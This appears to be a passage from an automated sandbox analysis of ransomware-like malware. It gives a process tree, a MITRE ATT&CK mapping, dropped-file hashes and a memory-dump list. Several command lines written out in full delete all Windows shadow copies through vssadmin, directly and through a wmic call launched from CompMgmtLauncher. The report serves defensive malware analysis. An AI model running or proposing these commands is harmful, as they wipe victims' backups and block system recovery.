PID:2636

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2652

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1576

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:876
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:344

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1144

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1540

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:220
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1144

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:232

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2984

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:2832
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:2416
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1624

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:784

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:580

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:1700
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:1760
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2312

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2784

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Privilege Escalation

Defense Evasion

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e34e21a02bd8b04dcbc0124894c6382f

SHA1
f63257d1b6a2e0cf4f47045c1df426089c096cf2

SHA256
84ad02ba3ea9cf407284611a6228d3cc3383fa54e4436ec6d87f1517e4dfec81

SHA512
07e58e1e72cda8663a2a77e01dd8a59c2596e8a3ee86236cfcdf8bcd4b4929edf6fb662420008786c89f29b7fd1aef9bb72c7d488b25b18633370a21b945714a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0e4c872d1ea0ab17f82147dc44544708

SHA1
5f89b53258885bba1ca85283df0c6818da297782

SHA256
d25943b84567b92b9cec8ca7da0834365b4f0b959fd7bfa1820fa7242220a9f8

SHA512
713addb7f9ffc68bbba7f02060a4a6b2e446dec04d0536e091b99f79b591ff427b119a2a8e004b2df63c211f70bee6cd6df13010479b2b5874b25eae5c78588d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9d99bb962f25b844c217e873216cd705

SHA1
1f33f0ca49ce85abb07f3422b61babb384320260

SHA256
f08da872174cc1c008f0154be3dfebd24c7c93f073f20e01b4d2a3dede4ffa56

SHA512
d9b69014cab9e36be5f566af6b431bd94c1d845ce87438bab3c959cde5d7e131cf0f3a70d2d7f091712f5317cc52a12b966473ec6c69000c8e2c0e9ff47aa083

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a10de4b5cb9522de47513a3867608701

SHA1
3f819c6305a2e34e6d2bc25514e538d0d30f1aa7

SHA256
0e505d1019add5e8671fef4f2865a497fc3e51680d957a659b56ec1c3810f340

SHA512
bd048d723174aec984824c65364ae5d3904d2244462d9d1e39c2f2e92ca2c8851d9194be7cf533654ba09d21ccbb78c6f4f9f323d4955faeb68a6488cb4b627c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
645c415e5d624ef9f4fcfff17a0c721f

SHA1
1b3a8f2a2336314bd45de2232e531d73084cf7c4

SHA256
f95ca1ea7a94cb5651da49aa6d079cb15356f284d36cb74d912f54cb9e8597b1

SHA512
42751369ca7ffdf8626a5cca10b238bc6e957c009ca7eda4650fb815086d0cb40cff678c854127a02596db5387927ce64625f4bb68397fa222fa52c4cd90183d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cd7fbe831d38f9e278d029d722dc8c93

SHA1
69355a0e101a1d5073ac2c7e664df339d2d4091e

SHA256
e09370cef2a7d3389b2376cfa68d9bf6b3289904c378afd69cd0dbe08bad8c3d

SHA512
07754eda6dd48d3d8c051f3b635c77055d1628dffaa8075149e38028bb23fa040b9568364f0b6c2e338edd9d1ac36a35de30d28080e2d3cd71557e8842ac99a7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
57e0cd32b99640e45b285218329c6546

SHA1
ba60f2a559acbe95568550baf7e095e88b6d4467

SHA256
1b2810bd143e452e02fa3ce77468de61bb4f06865d360f3cb60a127d92560dfa

SHA512
d6afef7313fdf2c11d5026e18544a4278ec5a27177db2149d35cb8cdfb6b9ed33d46fbd3d2febc959ead44f8337e79a543536ee0b92e89d0b8760a3f89dbf38e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ac88dfa920b262b1b192a8f6971e17c3

SHA1
79aa53d5209ef48afd4e587d268a87dd61135e33

SHA256
d6a67d18d68088d9868c10b0b4dc8a31c519192d73e5f219b569c29fadf48de0

SHA512
6926df7fb5af13b26cb8d7be32fb08fee59a903fc5e370d08c115ce233bb9d2601d8c200db205060e369979acff58047d344562a739f8e3feea55a49daa36c51

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6d20ad33581c751e8c52ed4ed9b2932c

SHA1
a1ee0f6cef21ab9856470be3e567403e37de6d50

SHA256
963491eea5af56ca53e8766d614116772da5594a681942da3e8b6c700ae27938

SHA512
faaa04e94705a388ba3d0edbdce024d8a59ea62897e0cbae48282a0585c94985963a10efbf6eae4caac59444971914c49bffff07b73bd6a89f311844713df066

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8759a516cddcf4c9384afed7be1eb7df

SHA1
61aa4f62bd7d543fa8fb63fc22cf94462ff85624

SHA256
910a85e8b6858e515db39de0744a79282649cc69c6f94c36f2ac50aedc54197d

SHA512
78470f9e2a711cc4a2648e2c136ee66bd77e477705e3b556513fd7c5b0d56d8a994f703ac5555e7973973bfe99035e5a657e0ef71235befe2a127026527b36c6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
817ae38ae8ab7aa55a7181d822228a8f

SHA1
81dcd28761bb787d910e970e7ae2f95708fa0f3a

SHA256
1d49eb7bd1a6213c1b63a42560ee95933ade34fb8f078787c18cafbae0299379

SHA512
0077286a4632464c494948dad0b32d5d37288dadc30d72b2e4208a5e6f816e4a005a6836ea40ce3d9e852d7b21ccc4a6926d7202d0d716a0ba6683e4eac9bb27

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7f32bc4b8994c3a276ef6ccf3c22a6e1

SHA1
9233d3521edaac27193aeb642c1c5bed0046d66a

SHA256
dec96a0895991a55996c2bb6fd6c4407d0a00d39aaad5eb8c8c07d981d4fdc41

SHA512
df1f3151efdb03cd73f09f96a4b5f31ea1b03681e2c73f15714628b7d9814e5de86c4f988a265b8a357a52aeb5df3c4919fcad9aecfcf3e8d492f627365518cd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9592dd6a6c6c71bc9883c5361b26c49a

SHA1
85be3df241785dc1d07805f669ac02e43d32709a

SHA256
8d33d20863f7f482a33bdbb1799fc3fd632ede08b6e74107bdd1b0f855b131c2

SHA512
ca4a900610c71db295e3a9a0e67d706838d18c9835cc90cd8da6fa01370d7c98a7997e4c59cb9705c150c04fa550bc81f59ee8c032af72c18cb383511edeb729

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
22b4123c06f6797f3c42ce0693299f29

SHA1
436627c9ab5fe743fcf4b774855380df2320e106

SHA256
4e71e3386a9de2a074821389bd9dfeaa338355dfabdb146c1e90502970f3bf70

SHA512
752716aba6c11dacea399130f26bc5e2d0bd934eaab95a8d7007676f010f46ebfa1e4342505a221809caa2cc02ccda8d350a3eca9ec505c9da5f1d731403aa9b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b295d0a4302158a2ef9bad9157bd724f

SHA1
780adedf0c37a71e1c6c6d3c4ba0626932eaf8ea

SHA256
f1f6cd8a6687fa90b5505f22f29d3d98e6ff1bc6ecf5a8464d44e826d21f33cd

SHA512
52ac127f034d05dee8a550e4feed672ca96fb2b293c306474bf3f9984c87d28c94ec6c8d13614c750dc8f14cfba746d18f55287fccb324a0bbb52ec9632dac87

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c4554eff85495e20e7b2394252794d5a

SHA1
9d5979a329439b1b78a18671122efb1979bb80da

SHA256
e6f65e15a86f3197326f30632fa938127f0457d7175f6b2a5b3c8418faecade6

SHA512
19d05f5588204aca65e77e2abe15837161289229497324e4e846d8efe29f3478ec7e3fabc9a9fab339d14e14d1a8936577aa2aa7edf2a279ae890505dc4e17c7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6aa33a5999a7084fc8f5e5f81ee74e48

SHA1
d6d467e2f7f08b9b7cc17c399333e6865d2779f5

SHA256
8886c58a0f00ff3cae79a6b7903b4f0672fdbd360a1d83f6fb7e69bb9694c0c4

SHA512
8bdcfa6db33d3a727a7d7297c8cd4a66817dba628bcf7dacbe7bde388e3d9b67a6b7080cb241c021cf26ad52bd8fbe80c8321c1152b38fe94f003c7a134d1441

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
681e87f0e7c918fb2624d74d1a6b3842

SHA1
3849a18bfd2e40318a159e8daef971314e43507d

SHA256
0f0b8fd0dff7244068ff87b95495ae5d7eefeacc263f169e138069c49c73f34c

SHA512
a1aa96705e4fd4710c4eaa570e565116073f99605a8d14bc4756ebaa60c17d9ae1c0b61a8d873c46327947169a295bf0fd2d915ae0e7568043f34078b2d9d62f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e074a24030c7574fdfafc4a5ba2cbb12

SHA1
d3a9ce95959686747ce62ada173fb4185657611e

SHA256
36d4840b94b079dbf1c70adda9843f01d799c620824b35aa03a392808a60108d

SHA512
8c262ee32cfef5dfaaea64e8bd9bec5ab0b362df2f52272ead2c754778bf24c04ec783fd9b5a83c0ed86d83972e6e73bd04f1559926e1c13a35e6a49a0db4c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab62B.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6EC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\Pictures\readme.txt

Filesize
1KB

MD5
2ceb8fb4b9fb237c73bc7459c7b4b88a

SHA1
2eb158ec1f1c2f28184da351db601f41fdac614b

SHA256
d0d6b9254b77b996f1ac0f32562b34609dce39936d2b6d3905d839526894de9a

SHA512
4f5a0641b20a9f8949e06fea648c2765ae66dcd46c0c6757b2a9f2041166aab4b976f36121842f94e095ad211866001c4508e6e9de8196de4ec40a020713e709

Download Submit
memory/1124-12-0x0000000001F10000-0x0000000001F15000-memory.dmp

Filesize
20KB

Download
memory/2000-3-0x0000000001D10000-0x0000000001D11000-memory.dmp

Filesize
4KB

Download
memory/2000-10-0x00000000024C0000-0x00000000024C1000-memory.dmp

Filesize
4KB

Download
memory/2000-9-0x0000000001DA0000-0x0000000001DA1000-memory.dmp

Filesize
4KB

Download
memory/2000-0-0x0000000001E40000-0x00000000024BC000-memory.dmp

Filesize
6.5MB

Download
memory/2000-8-0x0000000001D90000-0x0000000001D91000-memory.dmp

Filesize
4KB

Download
memory/2000-7-0x0000000001D50000-0x0000000001D51000-memory.dmp

Filesize
4KB

Download
memory/2000-6-0x0000000001D40000-0x0000000001D41000-memory.dmp

Filesize
4KB

Download
memory/2000-5-0x0000000001D30000-0x0000000001D31000-memory.dmp

Filesize
4KB

Download
memory/2000-4-0x0000000001D20000-0x0000000001D21000-memory.dmp

Filesize
4KB

Download
memory/2000-1-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/2000-2-0x0000000001D00000-0x0000000001D01000-memory.dmp

Filesize
4KB

Download
memory/2000-11-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2368-297-0x0000000002190000-0x0000000002290000-memory.dmp

Filesize
1024KB

Download